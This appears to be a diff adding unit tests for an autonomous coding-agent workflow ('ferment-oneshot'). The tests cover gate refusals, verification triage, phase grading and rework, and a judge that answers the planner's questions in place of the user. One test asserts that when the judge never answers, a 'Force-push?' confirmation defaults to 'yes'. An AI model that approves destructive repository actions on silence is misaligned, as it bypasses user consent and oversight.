+		// kimchi: "step-level flags don't feed the phase retry/escalation pipeline - they just refuse this
+		// single call, and the agent has to fix the underlying issue and re-call" (tools/steps.ts:427). The
+		// re-call is the SAME agent, in the same conversation, with the tools it used the first time.
+		expect(run.agent("step-turn").sessions).toBe(2)
+		expect(run.output).toMatchObject({ shipped: true, stepsDone: 1 })
+	})
+
+	it("stops re-entering once the attempt budget is spent, and records the step as not done", async () => {
+		// A real verify command, deliberately: kimchi validates gates BEFORE the verification, so a
+		// completion that never stops flagging must never reach it. `verify` is left unstubbed so that
+		// reaching it would actually shell out.
+		const trivialVerify = {
+			...onePhaseOneStep,
+			phases: [
+				{
+					name: "Fix the cli",
+					goal: "the cli prints ok",
+					steps: [{ description: "patch main.py so it prints ok", verify: "true" }],
+				},
+			],
+		}
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit },
+			agents: {
+				plan: [reply(trivialVerify)],
+				"step-turn": [reply(stepFlagged), reply(stepFlagged), reply(stepFlagged)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// STEP_MAX_ATTEMPTS re-entries, then the loop stops — kimchi caps it at all, because its
+		// orchestrator resolves the step with a planner turn this workflow does not have. One counter, not
+		// the product of two: the flag loop and the continuation loop are the same loop now.
+		expect(run.agent("step-turn").sessions).toBe(3)
+		expect(run.output).toMatchObject({ steps: 1, stepsDone: 0 })
+
+		// "Gate validation runs BEFORE any state mutation" — a refused call never reaches the verification.
+		const phaseGatePrompt = run.agent("phase-gates").messages[0] as string
+		expect(phaseGatePrompt).toContain("verification: not run — the completion was refused before verification")
+	})
+
+	it("triages a non-zero verification, and treats a benign one as done", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyFail },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"verify-judge": [reply({ verdict: "pass", reason: "the grep matched nothing, which is what the step wanted" })],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("verify-judge").sessions).toBe(1)
+		expect(run.agent("step-turn").sessions).toBe(1) // a benign exit is not a reason to redo the work
+		expect(run.output).toMatchObject({ stepsDone: 1 })
+
+		const triagePrompt = run.agent("verify-judge").messages[0] as string
+		expect(triagePrompt).toContain("strict verification triage judge")
+		expect(triagePrompt).toContain('prefer "fail" — false-pass is the worst outcome')
+		expect(triagePrompt).toContain("SyntaxError: stray paren")
+	})
+
+	it("sends the step back into its own session when triage calls the failure real", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyFail },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass), reply(stepPass), reply(stepPass)],
+				"verify-judge": [
+					reply({ verdict: "fail", reason: "the cli does not run at all" }),
+					reply({ verdict: "fail", reason: "still broken" }),
+					reply({ verdict: "fail", reason: "still broken" }),
+				],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("step-turn").sessions).toBe(3)
+		// kimchi's rule for a continuation, kept verbatim even though the box it was written for is gone:
+		// finish the same bounded work, do not widen it.
+		const second = run.agent("step-turn").messages[1] as string
+		expect(second).toContain("THIS STEP WAS NOT ACCEPTED, AND THIS IS A BOUNDED CONTINUATION")
+		expect(second).toContain("verification failed (exit 1)")
+		expect(second).toContain("do not widen the task, and do not start over")
+		expect(run.output).toMatchObject({ stepsDone: 0 })
+	})
+
+	it("reads a missing triage verdict as failure, the way kimchi does", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyFail },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass), reply(stepPass), reply(stepPass)],
+				// The step is `optional`; a judge that never answered leaves nothing behind. False-pass is the
+				// worst outcome available here, so silence must not advance the step.
+				"verify-judge": [],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.output).toMatchObject({ stepsDone: 0 })
+	})
+
+	it("re-enters a step whose turn returned nothing at all", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				// The turn failed outright: no summary, no verdicts, nothing anyone can account for. kimchi's
+				// session would be nudged back to the step; here the next iteration resumes that conversation.
+				"step-turn": [throws(new Error("output: the reply was not valid JSON")), reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("step-turn").sessions).toBe(2)
+		expect(run.agent("step-turn").messages[1]).toContain("the step turn returned nothing")
+		expect(run.output).toMatchObject({ stepsDone: 1 })
+	})
+
+	it("ships false when a ferment-scope gate flags", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [
+					reply({
+						summary: "not shippable",
+						gates: [
+							...gates(["C1", "C2"]),
+							{
+								id: "C3",
+								verdict: "flag",
+								rationale: "nothing ever ran the artifact",
+								evidence: "every verify is a grep",
+							},
+						],
+					}),
+				],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.output).toMatchObject({ shipped: false })
+	})
+})
+
+describe("ferment-oneshot: the phase grader", () => {
+	it("refuses a phase graded below the bar, reworks it, and grades it again", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass), reply(phasePass)],
+				// C on the first closing turn refuses; the rework lands and the second turn grades A.
+				"phase-grade": [reply(gradeC), reply(gradeA)],
+				"phase-rework": [reply(reworked)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("phase-rework").sessions).toBe(1)
+		expect(run.agent("phase-grade").sessions).toBe(2)
+		expect(run.output).toMatchObject({ shipped: true, phases: 1 })
+
+		// The rework is handed exactly what kimchi hands its planner: the grade, the bar, and the fixes.
+		const rework = run.agent("phase-rework").messages[0] as string
+		expect(rework).toContain("the grader assigned grade C, minimum required is A")
+		expect(rework).toContain("grep the working tree for conflict markers")
+
+		// The grader sees the diff, not just the agent's account of it.
+		const grader = run.agent("phase-grade").messages[0] as string
+		expect(grader).toContain("Verify the agent's claims independently using your tools")
+		expect(grader).toContain("--- PHASE DIFF ---")
+		expect(grader).toContain("_includes/about.md")
+		expect(grader).toContain("agent self-reported — verify independently")
+	})
+
+	it("tells the grader how much of the diff it is not being shown", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: {
+				...noGit,
+				verify: verifyOk,
+				"phase-diff": () => ({
+					available: true,
+					filesChanged: " app/main.py | 900 ++++",
+					diffSnippet: "@@ head @@\n[... truncated ...]\n@@ tail @@",
+					elidedBytes: 41_000,
+				}),
+			},
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		// A byte cap read as an absence of work is a phase refused for the wrong reason. The grader has
+		// tools and is told to verify independently; this is what tells it where it must.
+		const grader = run.agent("phase-grade").messages[0] as string
+		expect(grader).toContain("This snippet is truncated: 41000 bytes were elided")
+		expect(grader).toContain("check it rather than grading it absent")
+		expect(run.status).toBe("completed")
+	})
+
+	it("accepts a B after a rework, because the bar drops once the phase has been sent back", async () => {
+		const gradeB = { grade: "B", rationale: "goal met, one rough edge", recommendations: ["tidy the commit message"] }
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass), reply(phasePass)],
+				"phase-grade": [reply(gradeC), reply(gradeB)],
+				"phase-rework": [reply(reworked)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// A B would have been refused on the first turn and is accepted on the second: kimchi's
+		// `minimumAcceptableGrade` is A first, B after rework.
+		expect(run.agent("phase-grade").sessions).toBe(2)
+		expect(run.agent("phase-rework").sessions).toBe(1)
+	})
+
+	it("advances a phase it cannot fix rather than blocking forever", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": Array.from({ length: 6 }, () => reply(phasePass)),
+				"phase-grade": Array.from({ length: 6 }, () => reply(gradeC)),
+				"phase-rework": Array.from({ length: 6 }, () => reply(reworked)),
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// kimchi: "the agent had its retries; we don't block continuation indefinitely" — MAX_BLOCK_RETRIES
+		// reworks, then the grade is accepted and the phase advances with it recorded.
+		expect(run.agent("phase-rework").sessions).toBe(3)
+		expect(run.agent("phase-grade").sessions).toBe(4)
+		expect(run.output).toMatchObject({ phases: 1 })
+	})
+
+	it("advances when the grader itself never answered, because an unreachable judge is advisory", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [], // the step is optional; a grader that returns nothing must not block
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("phase-rework").sessions).toBe(0)
+		expect(run.output).toMatchObject({ shipped: true, phases: 1 })
+	})
+})
+
+describe("ferment-oneshot: a step turn that never answers its gates", () => {
+	it("advances the step on silence, instead of reading silence as a flag", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				// The turn ran but produced no parseable payload every time: the step is `optional`, so the
+				// engine records `step-failed` and hands `undefined` on.
+				"step-turn": [],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// No verdicts means no FLAG, so the completion is not REFUSED — the step is simply not done, for
+		// the recorded reason. kimchi's own rule for an unreachable judge reads the same way: advisory.
+		expect(run.agent("step-turn").sessions).toBe(3)
+		expect(run.output).toMatchObject({ stepsDone: 0 })
+
+		// And the silence is visible downstream rather than papered over: F1 reads every step's S2 verdict,
+		// and the verification still ran, because nothing refused it.
+		const phaseGatePrompt = run.agent("phase-gates").messages[0] as string
+		expect(phaseGatePrompt).toContain("step gates: (none)")
+		expect(phaseGatePrompt).toContain("verification: exit 0 (python /app/main.py)")
+	})
+})
+
+describe("ferment-oneshot: the gate re-call", () => {
+	it("sends a refused step back to the SAME session, with kimchi's refusal text", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepFlagged), reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// Two executions, ONE conversation: kimchi's orchestrator re-calls complete_ferment_step inside the
+		// session that flagged, having fixed the underlying issue itself.
+		expect(run.agent("step-turn").sessions).toBe(2)
+
+		const recall = run.agent("step-turn").messages[1] as string
+		expect(recall).toContain("cannot complete - agent self-flagged on 1 step gate(s)")
+		expect(recall).toContain("⛔ Gate S1:")
+		expect(recall).toContain("'omitted' with rationale if a gate truly does not apply")
+		// The three ways out, addressed to the agent that did the work — which is what makes "fix it
+		// yourself" an instruction it can carry out rather than a request it must forward.
+		expect(recall).toContain("You did this work and you flagged it, in this conversation")
+		expect(recall).toContain("fix the underlying issue with your tools")
+		expect(recall).toContain("vote 'omitted' with a rationale")
+		expect(run.output).toMatchObject({ stepsDone: 1 })
+	})
+})
+
+describe("ferment-oneshot: phase-scope flags", () => {
+	it("refuses a flagged phase without buying a grader, and reworks it", async () => {
+		const phaseFlagged = {
+			summary: "steps done but the trail is hollow",
+			gates: [
+				{
+					id: "F1",
+					verdict: "flag",
+					rationale: "every step verified by grep only",
+					evidence: "S2 was proxy on all four",
+				},
+				...gates(["F2", "F3"]),
+			],
+		}
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phaseFlagged), reply(phasePass)],
+				// Only ONE grade is scripted: the flagged closing turn must not reach the grader at all.
+				"phase-grade": [reply(gradeA)],
+				"phase-rework": [reply(reworked)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// kimchi: "no block flags from gates or project checks. Run the per-phase LLM grader" — a flagged
+		// phase goes straight to the retry pipeline, so the grader spawn is never bought for it.
+		expect(run.agent("phase-grade").sessions).toBe(1)
+		expect(run.agent("phase-rework").sessions).toBe(1)
+
+		const rework = run.agent("phase-rework").messages[0] as string
+		expect(rework).toContain("⛔ Gate F1: every step verified by grep only")
+		expect(run.output).toMatchObject({ shipped: true })
+	})
+})
+
+describe("ferment-oneshot: the interview", () => {
+	it("routes decision-blocking questions to the judge and replans with its answers", async () => {
+		const asking = {
+			...onePhaseOneStep,
+			questions: [
+				{
+					id: "target",
+					type: "single",
+					question: "Which python should the cli run under?",
+					options: [
+						{ id: "sys", label: "System python" },
+						{ id: "venv", label: "The project venv" },
+					],
+				},
+			],
+		}
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(asking), reply(onePhaseOneStep)],
+				judge: [
+					reply({
+						answers: [{ id: "target", value: "venv" }],
+						rationale: "the venv is what the task's own commands use",
+					}),
+				],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("judge").sessions).toBe(1)
+
+		const judgePrompt = run.agent("judge").messages[0] as string
+		expect(judgePrompt).toContain("You are standing in for the user during an autonomous ferment run")
+		expect(judgePrompt).toContain("Which python should the cli run under?")
+
+		// The planner's second pass is a REPLAN with the decision in hand, not a fresh start.
+		const passes = run.agent("plan").messages as string[]
+		expect(passes).toHaveLength(2)
+		expect(passes[0]).not.toContain("Answers from the judge")
+		expect(passes[1]).toContain("Answers from the judge")
+		expect(passes[1]).toContain("Which python should the cli run under?: venv")
+		expect(passes[1]).toContain("the venv is what the task's own commands use")
+		expect(run.agent("plan").sessions).toBe(2) // resumable: one conversation, two executions
+	})
+
+	it("keeps interviewing for as long as the planner keeps asking, with no round cap of its own", async () => {
+		const asking = { ...onePhaseOneStep, questions: [{ id: "target", type: "text", question: "Which python?" }] }
+		const answer = () => reply({ answers: [{ id: "target", value: "venv" }], rationale: "matches the task" })
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				// Four rounds of questions before the planner settles — more than any cap this used to impose.
+				plan: [reply(asking), reply(asking), reply(asking), reply(asking), reply(onePhaseOneStep)],
+				judge: [answer(), answer(), answer(), answer()],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// kimchi's interview runs until the planner stops asking; nothing here decides that for it. The run's
+		// own deadline (extension.ts) is the backstop, not a round counter in the workflow.
+		expect(run.agent("plan").sessions).toBe(5)
+		expect(run.agent("judge").sessions).toBe(4)
+		expect(run.output).toMatchObject({ phases: 1, stepsDone: 1 })
+	})
+
+	it("retries a judge that answers in prose, the way kimchi retries the form call", async () => {
+		const asking = {
+			...onePhaseOneStep,
+			questions: [
+				{
+					id: "target",
+					type: "single",
+					question: "Which python?",
+					options: [
+						{ id: "sys", label: "System" },
+						{ id: "venv", label: "Venv" },
+					],
+				},
+			],
+		}
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(asking), reply(onePhaseOneStep)],
+				// Two invalid replies, then a good one: kimchi loops the judge call up to
+				// ASK_USER_FORM_MAX_ATTEMPTS before giving up on it.
+				judge: [
+					throws(new Error("output: the reply was not valid JSON")),
+					throws(new Error("output: the reply was not valid JSON")),
+					reply({ answers: [{ id: "target", value: "venv" }], rationale: "the venv is what the task uses" }),
+				],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("judge").sessions).toBe(3) // two failures then the answer
+		expect(run.agent("plan").messages[1]).toContain("Which python?: venv") // the real answer reached the planner
+	})
+
+	it("answers on the judge's behalf with conservative defaults when it never comes back", async () => {
+		const asking = {
+			...onePhaseOneStep,
+			questions: [
+				{
+					id: "target",
+					type: "single",
+					question: "Which python?",
+					options: [
+						{ id: "sys", label: "System" },
+						{ id: "venv", label: "Venv" },
+					],
+				},
+				{ id: "force", type: "confirm", question: "Force-push?" },
+				{ id: "note", type: "text", question: "Anything else?" },
+			],
+		}
+		const dead = () => throws(new Error("output: the reply was not valid JSON"))
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(asking), reply(onePhaseOneStep)],
+				judge: [dead(), dead(), dead()],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("judge").sessions).toBe(3) // every attempt spent
+
+		// kimchi's `defaultAnswerForQuestion`: first option for single/multi, "yes" for confirm, an explicit
+		// non-answer for text — never silence, because a question the planner never gets answered is the one
+		// outcome the one-shot interview exists to prevent.
+		const replan = run.agent("plan").messages[1] as string
+		expect(replan).toContain("Which python?: sys")
+		expect(replan).toContain("Force-push?: yes")
+		expect(replan).toContain("(no answer — judge was unavailable)")
+		expect(replan).toContain("Judge was unavailable after 3 attempts")
+	})
+
+	it("breaks a phase the plan left empty into steps", async () => {
+		const emptyPhase = { ...plan, phases: [{ name: "Fix the cli", goal: "the cli prints ok", steps: [] }] }
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(emptyPhase)],
+				"refine-steps": [reply({ steps: [{ description: "patch main.py", verify: "python /app/main.py" }] })],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		expect(run.agent("refine-steps").sessions).toBe(1)
+		expect(run.agent("refine-steps").messages[0]).toContain("into 3–6 concrete steps")
+		expect(run.output).toMatchObject({ steps: 1, stepsDone: 1 })
+	})
+})
+
+describe("ferment-oneshot: what the steps are told", () => {
+	it("gives the planner kimchi's planning process and gate contract, and none of its turn machinery", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+		const planPrompt = run.agent("plan").messages[0] as string
+
+		// kimchi's own words, kept.
+		expect(planPrompt).toContain("You are running a one-shot ferment")
+		expect(planPrompt).toContain("Make the cli print ok.")
+		expect(planPrompt).toContain("STEP 1 — ORIENT")
+		expect(planPrompt).toContain("STEP 5 — PLAN")
+		expect(planPrompt).toContain("Does each phase have a verifiable success signal?")
+
+		// kimchi's continuation machinery, dropped: there is no turn to keep alive here.
+		expect(planPrompt).not.toContain("Turn discipline")
+		expect(planPrompt).not.toContain("Next action:")
+		expect(planPrompt).not.toContain("do not stall")
+		expect(planPrompt).not.toContain("scope_ferment")
+		expect(planPrompt).not.toContain("start_ferment_step")
+	})
+
+	it("tells the step turn to do the work itself, with the tier as advice and the start ref to cite from", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(plan)],
+				"step-turn": [reply({ ...stepPass, summary: "main.py prints ok now" }), reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		const [first, second] = run.agent("step-turn").messages as string[]
+		expect(first).toContain("📋 Plan first")
+		expect(first).toContain("Step 1/2: patch main.py so it prints ok")
+		expect(first).toContain("verify: python /app/main.py")
+		// kimchi's own direct-execution branch: "or execute the step directly using bash/edit/write".
+		expect(first).toContain("Execute this step directly, using bash/edit/write")
+		// The tier's limits, stated exactly as kimchi's limitsHint states them — and enforced by nothing,
+		// because nothing is dispatched. No landing instruction: there is no box to land inside.
+		expect(first).toContain("budget_tier=standard, max_turns=25, max_duration=300s, token_budget=100000")
+		expect(first).not.toContain("STOP WORKING AT")
+		// kimchi's `stepStartRef`, which is all it ever hands over about a step's diff.
+		expect(first).toContain("This step starts at git ref abc123")
+		expect(first).toContain("`git diff abc123` is exactly what it changed")
+		expect(first).not.toContain("Prior:") // nothing ran before it
+
+		// The second step is a later turn of the SAME conversation, but kimchi's `Prior:` line is sent
+		// anyway — it is what the step's own summary is for.
+		expect(second).toContain("budget_tier=narrow, max_turns=10, max_duration=180s, token_budget=50000")
+		expect(second).toContain('Prior: ✓1 "patch main.py so it prints ok" — main.py prints ok now')
+	})
+
+	it("asks the same turn for the gates, and tells the closing turns to go and look", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		// One prompt carries both halves of kimchi's turn: do the work, then answer for it.
+		const stepTurnPrompt = run.agent("step-turn").messages[0] as string
+		expect(stepTurnPrompt).toContain("Do its work, then run its verification yourself and fix what fails")
+		expect(stepTurnPrompt).toContain("Then answer for what you did")
+		expect(stepTurnPrompt).toContain("Does the summary describe work present in the diff?")
+		expect(stepTurnPrompt).toContain(
+			'a "flag" verdict refuses this completion and comes straight back to you to resolve',
+		)
+		expect(stepTurnPrompt).toContain("write the summary the following steps in this phase will read")
+
+		const phaseGatePrompt = run.agent("phase-gates").messages[0] as string
+		expect(phaseGatePrompt).toContain("Did every step's claim verify against real behavior")
+		expect(phaseGatePrompt).toContain("verification: exit 0 (python /app/main.py)") // what actually happened
+		expect(phaseGatePrompt).toContain("S1:pass")
+
+		const shipPrompt = run.agent("ship").messages[0] as string
+		// The phase row must survive the closing LOOP boundary: gates and grade live inside it, this reader
+		// does not. A bare read silently produced "(no phase summary)" / "(ungraded)" in a live run.
+		expect(shipPrompt).toContain("the cli prints ok") // the F-gate summary
+		expect(shipPrompt).toContain("F1:pass")
+		expect(shipPrompt).toContain("Is every success criterion from the plan satisfied?")
+		expect(shipPrompt).toContain("running the cli prints ok and exits 0") // the P3 checklist
+		expect(shipPrompt).toContain("C1 and C3 both ask for evidence, so go and look")
+	})
+
+	it("resolves that start ref for real, from the commit taken before the step began", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			// `step-start-ref` runs FOR REAL here (against this repository), because the read it makes is the
+			// part that can rot silently: a ref it could not resolve degrades to "there is no diff to cite"
+			// without anything failing — the exact shape of bug `mustRead` exists to prevent elsewhere.
+			steps: { "phase-start-ref": noGit["phase-start-ref"], "phase-diff": noGit["phase-diff"], verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		const stepTurnPrompt = run.agent("step-turn").messages[0] as string
+		expect(stepTurnPrompt).toMatch(/This step starts at git ref [0-9a-f]{40}\./)
+		expect(stepTurnPrompt).not.toContain("not a git repository")
+	})
+
+	it("says there is nothing to cite when there is no git repository to cite from", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			// What a container that is not a git repo produces: the evidence is best-effort, never fatal.
+			steps: { ...noGit, verify: verifyOk, "step-start-ref": () => ({ ref: "" }) },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		const stepTurnPrompt = run.agent("step-turn").messages[0] as string
+		expect(stepTurnPrompt).toContain("not a git repository")
+		expect(stepTurnPrompt).toContain("cite what you can show instead")
+		expect(run.status).toBe("completed")
+	})
+
+	it("shows a re-entered turn the verification that has already run, once one has", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyFail },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass), reply(stepPass), reply(stepPass)],
+				"verify-judge": [
+					reply({ verdict: "fail", reason: "the cli does not run at all" }),
+					reply({ verdict: "fail", reason: "still broken" }),
+					reply({ verdict: "fail", reason: "still broken" }),
+				],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		const [first, second] = run.agent("step-turn").messages as string[]
+		// kimchi runs the verify command INSIDE `complete_ferment_step`, after the gates — and a refused call
+		// never reaches it. So on a first attempt there is genuinely nothing to show.
+		expect(first).not.toContain("exit 1")
+		// From the second attempt on, the record exists and is handed over rather than re-run by the agent.
+		expect(second).toContain("$ python /app/main.py")
+		expect(second).toContain("exit 1")
+		expect(second).toContain("SyntaxError: stray paren")
+	})
+
+	it("asks the gates in kimchi's own second person, because that is who they are addressed to", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		// `complete_ferment_step` is called by the agent that did the work — one-shot kimchi omits
+		// `worker_agent_id` on all 31 of its completions, which `validateLinkedWorker` reads as "the
+		// orchestrator executed the step directly" (tools/steps.ts:146). kimchi's registry talks to it in
+		// the second person throughout, and this port had rewritten the S gates into the third ("Read the
+		// step's summary", "the verify command", "this work"). Same questions, different addressee — and an
+		// outside assessor answers them like one: over a live run S3 flagged 21 times against 15 passes, on
+		// correct work. The wording IS the mechanism.
+		const stepTurnPrompt = run.agent("step-turn").messages[0] as string
+		expect(stepTurnPrompt).toContain("Read your own summary.")
+		expect(stepTurnPrompt).toContain(
+			"If you claim a file you didn't touch, or a function not in the diff — flag this gate.",
+		)
+		expect(stepTurnPrompt).toContain("Classify your own verify command honestly:")
+		expect(stepTurnPrompt).toContain(
+			"Return 'flag' if your verify is proxy or sentinel for a step that claims semantic work.",
+		)
+		expect(stepTurnPrompt).toContain("Name one concrete input or condition that would make your work fail.")
+		expect(stepTurnPrompt).toContain("Then state whether your work handles it.")
+
+		const phaseGatePrompt = run.agent("phase-gates").messages[0] as string
+		expect(phaseGatePrompt).toContain("List anything you couldn't do, skipped, or deferred — by step or by intent.")
+	})
+})
+
+describe("ferment-oneshot: nobody is dispatched for a step", () => {
+	it("has no worker step at all, so a test cannot even script one", async () => {
+		// kimchi's one-shot orchestrator takes the direct branch of `start_ferment_step` every time: across
+		// six live runs, all 31 `complete_ferment_step` calls omitted `worker_agent_id`, and the session
+		// itself made 108 bash / 16 write / 13 edit calls and spawned nothing. The port used to model the
+		// other branch; this is the assertion that stops it coming back.
+		await expect(
+			createTestRun(fermentOneshot, {
+				input: roomyInput(),
+				steps: { ...noGit, verify: verifyOk },
+				agents: { plan: [reply(onePhaseOneStep)], worker: [reply({ status: "completed" })] },
+			}),
+		).rejects.toThrow('agent script for "worker": the workflow has no agent step with that name')
+	})
+
+	it("spends exactly one agent turn on a step that lands first time", async () => {
